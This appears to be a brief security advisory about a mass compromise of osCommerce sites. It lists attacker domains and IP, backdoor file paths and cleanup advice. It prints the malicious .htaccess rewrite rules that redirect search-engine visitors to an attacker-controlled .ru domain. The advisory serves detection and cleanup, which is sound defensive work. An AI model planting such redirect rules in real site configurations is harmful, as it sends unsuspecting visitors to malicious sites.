osCommerce attacks – kirm-sky.ru

We are seeing a very large number of osCommerce sites hacked on the last few days. If you are an osCommerce user, make sure to update it asap and check if to see if it’s been infected (also remove the file_manager.php from the admin directory).

These attacks seems to be using the same vulnerability used in previous attacks (nt02.co.in, nt04.in, etc).

The latest version consists of the following:

1 .htaccess is modified to redirect users to kirm-sky.ru, voice-nano.ru, devisionnetwork.ru, etc (just the first domain infected more than 600 sites according to Google).

This is what the .htaccess looks like:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
..
RewriteRule ^(.*)$ https://devisionnetwork.ru/suomi/index.php [R=301,L]

2 A backdoor is created inside /js/conf.php and another one at /flops.php. Make sure to remove these and search for other PHP files that are not part of the official osCommerce distribution.

3 Blackhat SEO SPAM is added to includes/application_bottom.php.

All the domains used in this attack are hosted at 91.204.48.37:

kirm-ar.ru
kirmar.ru
classwoods.ru
enterteiment-wizrd.ru
class-woods.ru
relax-july.ru
ar-kirm.ru
enterteimentwizrd.ru
tecros.ru
tutaanti.ru
kirm-sky.ru
sky-ar.ru
devisionnetwork.ru
voice-nano.ru

This is how our malware scanner detects an infected site:

We will post more details as we learn more about it. This link gives some good tips on how to secure osCommerce.

If your site is hacked and you need help, contact us a support@sucuri.net or https://sucuri.net